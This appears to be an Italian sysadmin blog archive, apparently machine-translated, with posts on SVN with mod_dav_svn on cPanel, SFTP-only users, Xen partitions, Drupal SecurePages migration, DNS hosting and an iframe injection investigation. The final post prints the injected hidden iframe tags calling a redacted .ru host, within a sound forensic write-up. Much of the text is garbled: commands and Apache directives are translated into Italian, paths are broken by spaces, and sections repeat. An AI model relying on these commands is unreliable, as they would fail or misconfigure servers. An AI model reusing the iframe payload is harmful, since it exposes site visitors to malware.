martedì 8 marzo 2016
Impostazione Subversion (SVN) e mod_dav_svn su Cpanel Server
Installare mod_dav_svn usando yum ( yum install mod_dav_svn ) - versione 1.4.x stessa subersion sopra.
Modulo mod_dav_svn carico di Apache. Vai alla GSA -> Configurazione del servizio -> Configurazione Apache -> Includi Editor -> Includere Pre-Main . Selezionare " Tutte le versioni " o la versione corrente di Apache (es: " 2.2.16 ") dal menu a discesa. Oppure si può modificare il loro file corrispondente direttamente:
Tutte le versioni: /usr/local/apache/conf/includes/pre_main_global.conf
Apache 2.2.16: /usr/local/apache/conf/includes/pre_main_2.conf
Aggiungere i codici qui sotto e fare clic su " Aggiornamento tasto" per salvare config. Ciò riavviare Apache se nessun errore della configurazione.
<IfModule mod_dav.c>
LoadModule dav_svn_module /usr/lib/httpd/modules/mod_dav_svn.so
LoadModule authz_svn_module /usr/lib/httpd/modules/mod_authz_svn.so
</ IfModule>
Creare repository e aggiungere l'accesso http (es: http://domain.com/svn)
Crea il tuo repository: svnadmin create / path / to / svn / repos
Aggiungere il codice sottostante per personalizzato del tuo dominio file di inclusione. È necessario creare questo file in base a questa guida per conservare quando si ricompila Apache / PHP. File di esempio (Apache2, non SSL / standard): /usr/local/apache/conf/userdata/std/2/cpanl_user/domain.com/svn.conf Contenuto del file:
<Location / svn>
# mod supporto DAV svn e la posizione dei file svn repo
DAV svn
SVNPath / path / to / svn / repos
# autenticazione per la sicurezza, creare utilizzando htpasswd
AuthType base
AuthName "SVN Access"
AuthUserFile / path / to / file / contenente / user.pass
Richiede valid-user
# aggiunto per i permessi / accesso
Order consentire, negare
Allow from all
</ Location>
martedì 26 gennaio 2016
Impostazione SFTP accesso in sola (Redhat-based Distro)
Impostazione sftp accesso in sola su difetto RedHat / CentOS install. Uso integrato sftp serverche è non-chroot e facile da installare.
Server: Individuare binario sftp-server e aggiungere alla vostra lista di shell valide sul sistema.
Nota: Questo sarà molto probabilmente vi darà questa: / usr / libexec / openssh / sftp server
Nota: Si consiglia di eseguire il backup / etc / shells primo
Account utente: Aggiungere o modificare gli account per utilizzare sftp-server.
Nuovo utente
Nota: il parametro importante c'è il "-s / usr / libexec / openssh / sftp-server", che imposta la shell di default per questo account. Per impostazione predefinita, si avrà "/ bin / bash".
Utente esistente:
martedì 5 gennaio 2016
Xen: Aggiungi partizioni extra da SO Guest
Ecco un modo per aggiungere e montare partizione LVM supplementare nelle macchine guest Xen.
1.) Creare partizione logica e formattarla. Nell'esempio riportato di seguito crea partizione "40GB" e formato "ext3" nel gruppo di volumi "vg0".
1
2
lvcreate -L 40G -n extra_storage vg0
mkfs -t ext3 -v / dev / vg0 / extra_storage
2.) Aggiornare config xen per aggiungere nuova partizione di sistema operativo guest. Assegnare il nome del dispositivo ad esso, ad esempio "xvda3". Quindi ricreare la VM di riconoscere la nuova partizione / dispositivo. Nota: il riavvio non legge la nuova configurazione Xen.
1
2
disk =
['phy: / dev / vg0 / extra_storage, xvda3, w',
3.) Dopo il riavvio, accedere al VM e montare la nuova partizione. Nuova unità o partizione shoud essere in "/ dev / xvda3."
1
mount / dev / xvda3 / extra_space
Aggiungilo a "/ etc / fstab" per automount al riavvio.
1
/ dev / xvda3 / extra_space ext3 noatime, nodiratime, errors = remount-ro 0 1
1.) Creare partizione logica e formattarla. Nell'esempio riportato di seguito crea partizione "40GB" e formato "ext3" nel gruppo di volumi "vg0".
1
2
lvcreate -L 40G -n extra_storage vg0
mkfs -t ext3 -v / dev / vg0 / extra_storage
2.) Aggiornare config xen per aggiungere nuova partizione di sistema operativo guest. Assegnare il nome del dispositivo ad esso, ad esempio "xvda3". Quindi ricreare la VM di riconoscere la nuova partizione / dispositivo. Nota: il riavvio non legge la nuova configurazione Xen.
1
2
disk =
['phy: / dev / vg0 / extra_storage, xvda3, w',
3.) Dopo il riavvio, accedere al VM e montare la nuova partizione. Nuova unità o partizione shoud essere in "/ dev / xvda3."
1
mount / dev / xvda3 / extra_space
Aggiungilo a "/ etc / fstab" per automount al riavvio.
1
/ dev / xvda3 / extra_space ext3 noatime, nodiratime, errors = remount-ro 0 1
martedì 24 marzo 2015
Problema Moving Drupal sito con SecurePages Module Abilitato
Ho fatto una copia del sito drupal6 con SecurePages modulo installato e configurato. Questo modulo è configurato per reindirizzare tutte o alcune pagine https - a seconda delle configurazioni. Per la nostra installazione di solito includiamo sezioni login e admin per reindirizzare a https.
Il problema è sul sito copiato che si trova su un nuovo dominio in quanto non siamo in grado di effettuare il login e accedere alla sezione admin perché reindirizzare indietro al / sito originale di origine. Quello che ci serve è o disabilitare il modulo securepages o aggiornare i domini. Per fare questo, è necessario accedere al database (es: phpmyadmin, etc), andare a variabili tavolo, e la ricerca di securepages configurazioni.
Se si desidera disattivare il cambio modulo:
1
s securepages_enable: 1: "1 ** **";
a
1
s securepages_enable: 1: "** 0 **";
Oppure, se si desidera aggiornare il cambio di dominio:
1
2
securepages_basepath s: 30: "http: //**www.domain.com**";
securepages_basepath_ssl s: 31: "https: //**www.domain.com**";
a
1
2
securepages_basepath s: 30: "http: //**www.newdomain.com**";
securepages_basepath_ssl s: 31: "https: //**www.newdomain.com**";
Dopo aver apportato le modifiche di cui sopra non dimenticare di eseguire il update.php ( http://www.newdomain.com/update.php )
Se si desidera disinstallare il modulo, provare a rimuovere la directory securepages ed eseguire update.php.
Il problema è sul sito copiato che si trova su un nuovo dominio in quanto non siamo in grado di effettuare il login e accedere alla sezione admin perché reindirizzare indietro al / sito originale di origine. Quello che ci serve è o disabilitare il modulo securepages o aggiornare i domini. Per fare questo, è necessario accedere al database (es: phpmyadmin, etc), andare a variabili tavolo, e la ricerca di securepages configurazioni.
Se si desidera disattivare il cambio modulo:
1
s securepages_enable: 1: "1 ** **";
a
1
s securepages_enable: 1: "** 0 **";
Oppure, se si desidera aggiornare il cambio di dominio:
1
2
securepages_basepath s: 30: "http: //**www.domain.com**";
securepages_basepath_ssl s: 31: "https: //**www.domain.com**";
a
1
2
securepages_basepath s: 30: "http: //**www.newdomain.com**";
securepages_basepath_ssl s: 31: "https: //**www.newdomain.com**";
Dopo aver apportato le modifiche di cui sopra non dimenticare di eseguire il update.php ( http://www.newdomain.com/update.php )
Se si desidera disinstallare il modulo, provare a rimuovere la directory securepages ed eseguire update.php.
giovedì 5 marzo 2015
Managed DNS Servizi Showdown
Un tempo in cui ha più senso di business di esternalizzare DNS. Mentre si può utilizzare un registrar di domini per gestire e host DNS non sempre offrono migliori prestazioni o anche offrire SLA. Metteremo a confronto un paio di aziende che si specializzano in DNS solo hosting.
DynDNS
servizi completi offerti
senza tempi di fermo dall'inizio (2001)
DNS del cluster in tutto il mondo
multipiattaforma client di aggiornamento dinamico con eccellente documentazione
29,95 per zona all'anno
interfaccia web
SLA opzioni Offerings
Architettura basata Bind
EasyDNS
sconosciuto affidabilità
DNS del cluster in tutto il mondo
multipiattaforma client di aggiornamento dinamico
al prezzo di 19,99 dollari per zona all'anno
interfaccia web
nessuna offerta SLA
Architettura basata Bind
Nettica
sconosciuto affidabilità
DNS del cluster per lo più statunitense (1 posizione in UK)
al prezzo di $ 10 per zona all'anno
100 $ SLA offerta
nessun cliente aggiornamento linux, aggiornamenti ip dinamici tuttavia può essere fatto con l'arricciatura chiamata al loro sito web
interfaccia web
API di Windows solo di
ZoneEdit
Pioniere di DNS ospitato
Recente affidabilità Bad
Architettura basata Bind
DNS del cluster per lo più statunitense (1 posizione in Germania)
multipiattaforma client di aggiornamento dinamico
un'ampia gamma di clienti dinamiche aggiornamento (Java, Python, Perl, le chiamate dirette al loro sito web con wget), clienti ospitato su SourceForge documentazione limitata
ospitare 5 domini per libero, limitato a limite di query 200meg per dominio (circa 1 milione di query), altre opzioni di costo "crediti di zona @ $ 10,95 ciascuno" per servizi come domini aggiuntivi, bilanciamento del carico, il monitoraggio, query aggiuntive.
UltraDNS
Lista molto completa di offerte
15 nodi tutto il mondo su 5 continenti
Protezione contro DDOS DNS basato
API basata su XML cross platform
portale web
100% di uptime SLA
directory architettura basata, usando la tecnologia di replica di database Oracle. Non sulla base di BIND
$ 15 al mese per 1 dominio con 5 dischi e 5000 domande, i costi eccedenti sono $ 1 per 1.000 query e 0,50 centesimi per ogni ulteriore record.
DynDNS
servizi completi offerti
senza tempi di fermo dall'inizio (2001)
DNS del cluster in tutto il mondo
multipiattaforma client di aggiornamento dinamico con eccellente documentazione
29,95 per zona all'anno
interfaccia web
SLA opzioni Offerings
Architettura basata Bind
EasyDNS
sconosciuto affidabilità
DNS del cluster in tutto il mondo
multipiattaforma client di aggiornamento dinamico
al prezzo di 19,99 dollari per zona all'anno
interfaccia web
nessuna offerta SLA
Architettura basata Bind
Nettica
sconosciuto affidabilità
DNS del cluster per lo più statunitense (1 posizione in UK)
al prezzo di $ 10 per zona all'anno
100 $ SLA offerta
nessun cliente aggiornamento linux, aggiornamenti ip dinamici tuttavia può essere fatto con l'arricciatura chiamata al loro sito web
interfaccia web
API di Windows solo di
ZoneEdit
Pioniere di DNS ospitato
Recente affidabilità Bad
Architettura basata Bind
DNS del cluster per lo più statunitense (1 posizione in Germania)
multipiattaforma client di aggiornamento dinamico
un'ampia gamma di clienti dinamiche aggiornamento (Java, Python, Perl, le chiamate dirette al loro sito web con wget), clienti ospitato su SourceForge documentazione limitata
ospitare 5 domini per libero, limitato a limite di query 200meg per dominio (circa 1 milione di query), altre opzioni di costo "crediti di zona @ $ 10,95 ciascuno" per servizi come domini aggiuntivi, bilanciamento del carico, il monitoraggio, query aggiuntive.
UltraDNS
Lista molto completa di offerte
15 nodi tutto il mondo su 5 continenti
Protezione contro DDOS DNS basato
API basata su XML cross platform
portale web
100% di uptime SLA
directory architettura basata, usando la tecnologia di replica di database Oracle. Non sulla base di BIND
$ 15 al mese per 1 dominio con 5 dischi e 5000 domande, i costi eccedenti sono $ 1 per 1.000 query e 0,50 centesimi per ogni ulteriore record.
lunedì 2 marzo 2015
Svnadmin: Impossibile aprire il file 'svn / db / fsfs.conf': Nessun file o directory
Dopo ho fatto un archivio di backup manuale del repo (un semplice tar.gz della cartella repo) ho eseguito il comando di aggiornamento sicuro che questo sta andando a risolvere il mio problema:
1
svnadmin aggiornare / svn / repo /
e dopo ha completato, ho verificato che svn stava ancora lavorando come previsto e controllato per il file fsfs.conf. Ma che è stato creato non ... Hmm ... Proviamo il comando copia a caldo comunque:
1
2
svnadmin hotcopy --clean-logs / svn / repo / / tmp / repo /
svnadmin: directory No such file or: Impossibile aprire il file '/svn/repo/db/fsfs.conf'
esattamente lo stesso errore.
Cercando di capire ciò che il file contiene fsfs.conf Ho appena creato un nuovo repository per vedere se viene creato. In effetti il mio v1.6.11 del svn creato il file di un nuovo repo, e dopo averlo copiato nella posizione del mio repository esistenti (come è stato fondamentalmente solo un file vuoto) il mio problema è stato risolto e il comando copia a caldo ha iniziato a lavorare. Ecco il contenuto del file come creato da mia versione svn, che ho copiato nella repo più vecchio per risolvere questo problema:
<Code> cat fsfs.conf
### Questo file controlla la configurazione del file system FSFS.
[memcached-server]
### Queste opzioni citarne server memcached utilizzati per memorizzare nella cache interna FSFS
### dati. Vedere http://www.danga.com/memcached/ per ulteriori informazioni su
### Memcached. Per utilizzare memcached con FSFS, eseguire uno o più memcached
### Server e specificare ognuno di loro in opzione in questo modo:
# First-server = 127.0.0.1:11211
# Remote-memcached = mymemcached.corp.example.com:11212
### Il nome dell'opzione viene ignorata; il valore è nella forma host: porta.
### Server memcached possono essere condivisi tra più repository;
### Tuttavia, se si fa questo, si deve * * garantire che i repository hanno
### UUID distinte e percorsi, o dati memorizzati nella cache da un altro repository
### Può essere utilizzato da un altro accidentalmente. Si noti inoltre che memcached ha
### Nessuna autenticazione per legge o scrive, quindi è necessario assicurarsi che la vostra
### server memcached sono accessibili solo dagli utenti fidati.
[cache]
### Quando si verifica un errore di cache-correlati, normalmente Subversion ignora
### E continua, la registrazione di un errore se il server è appropriato
### Configurato (e ignorando con file: // accesso). Per rendere
### Subversion mai ignorare gli errori della cache, togliere il commento di linea.
# Fail-stop = true
[Rep-sharing]
### Per risparmiare spazio, il filesystem può opzionalmente evitare di memorizzare
### Duplicare rappresentazioni. Questo ha un lieve costo in performace,
### Come il mantenimento di un database di rappresentazioni condivise può aumentare
### Commit volte. Il risparmio di spazio dipendono dalla dimensione della
### Repository, il numero di oggetti che contiene e la quantità di
### Doppioni fra loro, di solito una funzione della ramificazione e
### Processo di fusione.
###
### Il parametro seguente consente rep-sharing nel repository. Può
### Essere attivata e disattivata a piacimento, ma per i migliori risultati di spazio-risparmio
### Dovrebbero essere in grado costantemente per tutta la durata del deposito.
# Enable-rep-sharing = false </ code>
Speriamo che questo aiuterà gli altri di vedere lo stesso problema che stavo vivendo.
venerdì 20 febbraio 2015
Iframe iniezione Attacco Investigation
Tutta la vulnerabilità IFRAME nascosto è in corso da qualche tempo, solo alcuni dei nostri clienti sono stati effettuati da questo. La rete è ancora piena di questo problema e mentre alcuni dicono che l'iniezione sono risultati di insicurezze php, mysql iniezione o cross site scripting, mentre altri indicano keylogger e dirottati credenziali FTP. Nel nostro caso l'exploit non è stato a causa di una vulnerabilità di un'applicazione, ma piuttosto di Hijacked informazioni ftp login. Attacchi indovinare bruta della password vigore non sono stati eseguiti su tale conto, né qualsiasi altro account sullo stesso server. In questo particolare tipo di attacco, alla fine di index.php / index.html un'istruzione IFRAME è stato allegato modifica indesiderata tag pagina di chiusura.
iframe src = "http: //***.ru: 8080 / index.php" width = 111 height = 162 style = "visibi
iframe src = "http: //***.ru: 8080 / index.php" width = 136 height = 162 style = "visibility: hidden" / iframe
iframe src = "http: //***.ru: 8080 / index.php" width = 141 height = 156 style = "visibility: hidden" / iframe
Alcuni dei file index.php avevano più istruzioni IFRAME aggiunti alla fine. Conoscere il nome utente di account interessato e il nome del file in questione ho cercato in / var / log / messages per eventuali voci correlate e ha colpito jackpot:
agosto 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] utente è loggato in
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [AVVISO] / home / utente // public_html / index.php scaricato (2311 bytes, 1001.70KB / sec)
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Esci.
27 Agosto 01:28: 04 web152 pure-ftpd: (?@78.92.144.185) [INFO] utente è loggato in
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [ATTENZIONE] / home / user // public_html /index.php caricati (2353 bytes, 10.42KB / sec)
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.
La cosa interessante da notare qui è che anche se il download / upload di index.php avviene all'interno di una seconda finestra 6, l'indirizzo IP di origine per il download e l'upload non sono gli stessi. Nei prossimi giorni lo stesso file viene scaricato e caricato, ma non dallo stesso insieme di indirizzi IP. Durante i pochi giorni che mi permetteva questo accada mentre stavo controllando tale attività e raccogliere gli indirizzi IP per vedere se emerge un modello:
83.82.57.39 GeoIP Edizione Nazionale: NL, Netherlands
95.52.163.74 GeoIP Edizione Nazionale: RU, Federazione Russa
189.122.164.40 GeoIP Edizione Nazionale: BR, Brazil
69.159.47.21 GeoIP Edizione Nazionale: CA, Canada
85.221.184.164 GeoIP Edizione Nazionale: PL, Polonia
98.243.198.220 GeoIP Edizione Nazionale: US, Stati Uniti
78.30.154.22 GeoIP Edizione Nazionale: RS, Serbia
77.81.33.229 GeoIP Edizione Nazionale: RO, Romania
83.6.73.91 GeoIP Edizione Nazionale: PL, Poland
190.198.3.27 GeoIP Edizione Nazionale: VE , Venezuela
75.208.130.92 GeoIP Edizione Nazionale: US, Stati Uniti
68.84.202.157 GeoIP Edizione Nazionale: US, Stati Uniti
75.80.81.104 GeoIP Edizione Nazionale: US, Stati Uniti
Vedendo che nessun modello chiaro è evidente qui e considerando che l'indirizzo IP è stato diverso per ogni connessione è la mia logica che il computer di questi indirizzi IP erano una parte di una botnet. La mia ipotesi è che uno sviluppatore aveva salvato la password di account ed è stato infettato da software dannoso che è stato in grado di raccogliere le credenziali FTP.
Cleanup incluso il ripristino dei file e la modifica di tutte le password conto / ftp / e-mail e database.
Posted by Max Veprinsky 21 settembre st 2009 Sicurezza , ospitando
«HowTo errori di visualizzazione PHP quando non si ha accesso a php.ini Errore Drupal Watchdog »
Commenti
iframe src = "http: //***.ru: 8080 / index.php" width = 111 height = 162 style = "visibi
iframe src = "http: //***.ru: 8080 / index.php" width = 136 height = 162 style = "visibility: hidden" / iframe
iframe src = "http: //***.ru: 8080 / index.php" width = 141 height = 156 style = "visibility: hidden" / iframe
Alcuni dei file index.php avevano più istruzioni IFRAME aggiunti alla fine. Conoscere il nome utente di account interessato e il nome del file in questione ho cercato in / var / log / messages per eventuali voci correlate e ha colpito jackpot:
agosto 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] utente è loggato in
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [AVVISO] / home / utente // public_html / index.php scaricato (2311 bytes, 1001.70KB / sec)
27 agosto 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Esci.
27 Agosto 01:28: 04 web152 pure-ftpd: (?@78.92.144.185) [INFO] utente è loggato in
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [ATTENZIONE] / home / user // public_html /index.php caricati (2353 bytes, 10.42KB / sec)
27 agosto 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.
La cosa interessante da notare qui è che anche se il download / upload di index.php avviene all'interno di una seconda finestra 6, l'indirizzo IP di origine per il download e l'upload non sono gli stessi. Nei prossimi giorni lo stesso file viene scaricato e caricato, ma non dallo stesso insieme di indirizzi IP. Durante i pochi giorni che mi permetteva questo accada mentre stavo controllando tale attività e raccogliere gli indirizzi IP per vedere se emerge un modello:
83.82.57.39 GeoIP Edizione Nazionale: NL, Netherlands
95.52.163.74 GeoIP Edizione Nazionale: RU, Federazione Russa
189.122.164.40 GeoIP Edizione Nazionale: BR, Brazil
69.159.47.21 GeoIP Edizione Nazionale: CA, Canada
85.221.184.164 GeoIP Edizione Nazionale: PL, Polonia
98.243.198.220 GeoIP Edizione Nazionale: US, Stati Uniti
78.30.154.22 GeoIP Edizione Nazionale: RS, Serbia
77.81.33.229 GeoIP Edizione Nazionale: RO, Romania
83.6.73.91 GeoIP Edizione Nazionale: PL, Poland
190.198.3.27 GeoIP Edizione Nazionale: VE , Venezuela
75.208.130.92 GeoIP Edizione Nazionale: US, Stati Uniti
68.84.202.157 GeoIP Edizione Nazionale: US, Stati Uniti
75.80.81.104 GeoIP Edizione Nazionale: US, Stati Uniti
Vedendo che nessun modello chiaro è evidente qui e considerando che l'indirizzo IP è stato diverso per ogni connessione è la mia logica che il computer di questi indirizzi IP erano una parte di una botnet. La mia ipotesi è che uno sviluppatore aveva salvato la password di account ed è stato infettato da software dannoso che è stato in grado di raccogliere le credenziali FTP.
Cleanup incluso il ripristino dei file e la modifica di tutte le password conto / ftp / e-mail e database.
Posted by Max Veprinsky 21 settembre st 2009 Sicurezza , ospitando
«HowTo errori di visualizzazione PHP quando non si ha accesso a php.ini Errore Drupal Watchdog »
Commenti
Iscriviti a:
Post (Atom)